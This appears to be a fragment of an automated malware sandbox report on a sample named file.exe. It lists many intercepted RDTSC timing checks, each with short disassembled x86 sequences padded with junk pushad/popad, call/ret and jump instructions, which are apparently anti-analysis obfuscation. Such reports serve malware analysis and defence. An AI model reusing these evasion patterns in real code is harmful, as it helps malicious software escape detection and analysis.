                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8DC46 second address: F8DC7B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F49A8F2A326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push ebx 0x0000000d jmp 00007F49A8F2A334h 0x00000012 pop ebx 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b js 00007F49A8F2A326h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8C599 second address: F8C59E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8CD02 second address: F8CD06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F896 second address: F8F89A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F89A second address: F8F8A0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F8A0 second address: F8F8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F49A854EEAEh 0x0000000c jmp 00007F49A854EEA8h 0x00000011 popad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jnl 00007F49A854EE96h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F94220 second address: F9422A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F49A8F2A326h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9422A second address: F94277 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F49A854EE9Eh 0x0000000e pushad 0x0000000f jmp 00007F49A854EEA8h 0x00000014 push eax 0x00000015 pop eax 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F49A854EEA7h 0x00000020 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F94277 second address: F94290 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F49A8F2A326h 0x00000008 jne 00007F49A8F2A326h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F94290 second address: F942AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A854EEA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F942AC second address: F942B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F942B2 second address: F942B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4DD7E second address: F4DD82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4DD82 second address: F4DDA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F49A854EEA2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F49A854EE96h 0x00000013 jg 00007F49A854EE96h 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93B2E second address: F93B65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F49A8F2A326h 0x00000009 jmp 00007F49A8F2A335h 0x0000000e jmp 00007F49A8F2A333h 0x00000013 popad 0x00000014 push ecx 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93DEC second address: F93E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49A854EEA1h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93E07 second address: F93E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96CE8 second address: F96CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96CEE second address: F96D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49A8F2A335h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F49A8F2A326h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96D14 second address: F96D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F97432 second address: F97442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49A8F2A32Ch 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F97B97 second address: F97B9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F97B9B second address: F97B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F98042 second address: F98047 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F98047 second address: F9807F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F49A8F2A326h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jnc 00007F49A8F2A332h 0x00000014 xchg eax, ebx 0x00000015 jmp 00007F49A8F2A332h 0x0000001a nop 0x0000001b push ecx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F98254 second address: F9825B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9864B second address: F98651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F98651 second address: F98656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F98656 second address: F9865B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9865B second address: F986BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F49A854EEA5h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F49A854EE98h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a push edx 0x0000002b mov dword ptr [ebp+122D1D8Ah], eax 0x00000031 pop edi 0x00000032 xchg eax, ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F49A854EEA4h 0x0000003a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F98BE1 second address: F98BE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F98BE7 second address: F98BED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F98BED second address: F98BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F994AB second address: F994B5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F49A854EE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F99351 second address: F99375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 js 00007F49A8F2A328h 0x0000000d popad 0x0000000e push eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F49A8F2A330h 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F994B5 second address: F99513 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F49A854EE9Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b ja 00007F49A854EEACh 0x00000011 nop 0x00000012 call 00007F49A854EE9Fh 0x00000017 pushad 0x00000018 mov ax, 18DBh 0x0000001c sub dword ptr [ebp+122D2797h], ebx 0x00000022 popad 0x00000023 pop esi 0x00000024 push 00000000h 0x00000026 sbb si, EAE8h 0x0000002b push 00000000h 0x0000002d mov di, cx 0x00000030 xchg eax, ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 pushad 0x00000035 popad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F99513 second address: F99518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F99518 second address: F99531 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F49A854EE9Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9A5A3 second address: F9A627 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A338h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b jmp 00007F49A8F2A32Ch 0x00000010 nop 0x00000011 jmp 00007F49A8F2A335h 0x00000016 push 00000000h 0x00000018 mov esi, dword ptr [ebp+122D37CEh] 0x0000001e push eax 0x0000001f mov di, cx 0x00000022 pop esi 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push eax 0x00000028 call 00007F49A8F2A328h 0x0000002d pop eax 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 add dword ptr [esp+04h], 00000015h 0x0000003a inc eax 0x0000003b push eax 0x0000003c ret 0x0000003d pop eax 0x0000003e ret 0x0000003f mov esi, dword ptr [ebp+122D3882h] 0x00000045 xchg eax, ebx 0x00000046 jmp 00007F49A8F2A32Ch 0x0000004b push eax 0x0000004c pushad 0x0000004d push esi 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9A627 second address: F9A62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9AE9F second address: F9AEA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9BAAC second address: F9BAC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 ja 00007F49A854EE98h 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9CF0D second address: F9CF99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 push eax 0x00000007 jmp 00007F49A8F2A32Eh 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F49A8F2A328h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 jmp 00007F49A8F2A334h 0x0000002c push 00000000h 0x0000002e pushad 0x0000002f mov dword ptr [ebp+122D1D8Ah], edi 0x00000035 mov ecx, dword ptr [ebp+1244BB34h] 0x0000003b popad 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007F49A8F2A328h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 00000014h 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 mov dword ptr [ebp+122D1DA3h], edi 0x0000005e xchg eax, ebx 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jne 00007F49A8F2A326h 0x00000069 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9CF99 second address: F9CFA3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F49A854EE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9CFA3 second address: F9CFA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9CC9B second address: F9CCA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9D842 second address: F9D86A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F49A8F2A337h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jl 00007F49A8F2A33Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9DA6C second address: F9DA70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9DA70 second address: F9DA76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA1E65 second address: FA1E6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA462A second address: FA4641 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A333h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA4641 second address: FA464F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA464F second address: FA4653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6539 second address: FA6543 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F49A854EE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA4653 second address: FA46FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A32Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F49A8F2A328h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+122D3606h] 0x0000002b push dword ptr fs:[00000000h] 0x00000032 adc edi, 5D710837h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f push 00000000h 0x00000041 push ecx 0x00000042 call 00007F49A8F2A328h 0x00000047 pop ecx 0x00000048 mov dword ptr [esp+04h], ecx 0x0000004c add dword ptr [esp+04h], 00000018h 0x00000054 inc ecx 0x00000055 push ecx 0x00000056 ret 0x00000057 pop ecx 0x00000058 ret 0x00000059 mov eax, dword ptr [ebp+122D0679h] 0x0000005f mov ebx, 146A5469h 0x00000064 push FFFFFFFFh 0x00000066 pushad 0x00000067 mov esi, 5061706Bh 0x0000006c movzx ecx, dx 0x0000006f popad 0x00000070 nop 0x00000071 jmp 00007F49A8F2A336h 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 jns 00007F49A8F2A32Ch 0x0000007f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA7544 second address: FA7550 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA858C second address: FA8590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA77AA second address: FA7849 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F49A854EE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d add edi, dword ptr [ebp+122D38DAh] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov edi, dword ptr [ebp+122D21C2h] 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F49A854EE98h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 00000017h 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 mov eax, dword ptr [ebp+122D0529h] 0x00000047 pushad 0x00000048 mov edi, dword ptr [ebp+12449513h] 0x0000004e mov edi, dword ptr [ebp+122D1C86h] 0x00000054 popad 0x00000055 mov ebx, edi 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push esi 0x0000005c call 00007F49A854EE98h 0x00000061 pop esi 0x00000062 mov dword ptr [esp+04h], esi 0x00000066 add dword ptr [esp+04h], 00000019h 0x0000006e inc esi 0x0000006f push esi 0x00000070 ret 0x00000071 pop esi 0x00000072 ret 0x00000073 add dword ptr [ebp+1245BC9Bh], ebx 0x00000079 nop 0x0000007a pushad 0x0000007b jmp 00007F49A854EEA5h 0x00000080 pushad 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA971D second address: FA9734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49A8F2A32Fh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB590 second address: FAB595 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA9802 second address: FA9809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA9809 second address: FA9810 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB0DEF second address: FB0DF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAC716 second address: FAC71A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB715 second address: FAB719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAC71A second address: FAC728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F49A854EE9Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1000 second address: FB1006 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2C0F second address: FB2C13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAC728 second address: FAC7AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov dword ptr [ebp+122D1D8Ah], esi 0x0000000c or ebx, 5CF48D29h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov ebx, dword ptr [ebp+122D185Ch] 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 mov bh, D8h 0x00000028 mov eax, dword ptr [ebp+122D1365h] 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F49A8F2A328h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D1D79h], edx 0x0000004e push FFFFFFFFh 0x00000050 or di, 2BB7h 0x00000055 nop 0x00000056 pushad 0x00000057 push esi 0x00000058 jmp 00007F49A8F2A32Bh 0x0000005d pop esi 0x0000005e push ebx 0x0000005f jmp 00007F49A8F2A334h 0x00000064 pop ebx 0x00000065 popad 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1006 second address: FB100A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2C13 second address: FB2C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAC7AB second address: FAC7B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2C19 second address: FB2C1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2C1E second address: FB2C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jg 00007F49A854EE9Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2C31 second address: FB2CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49A8F2A338h 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F49A8F2A328h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 sbb bx, 49AFh 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+1244956Fh], esi 0x00000032 mov bl, ah 0x00000034 push 00000000h 0x00000036 call 00007F49A8F2A32Ah 0x0000003b xor edi, 7434BE0Ah 0x00000041 pop edi 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F49A8F2A333h 0x0000004a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2CAB second address: FB2CCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F49A854EE96h 0x00000009 jmp 00007F49A854EE9Fh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2CCD second address: FB2CD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
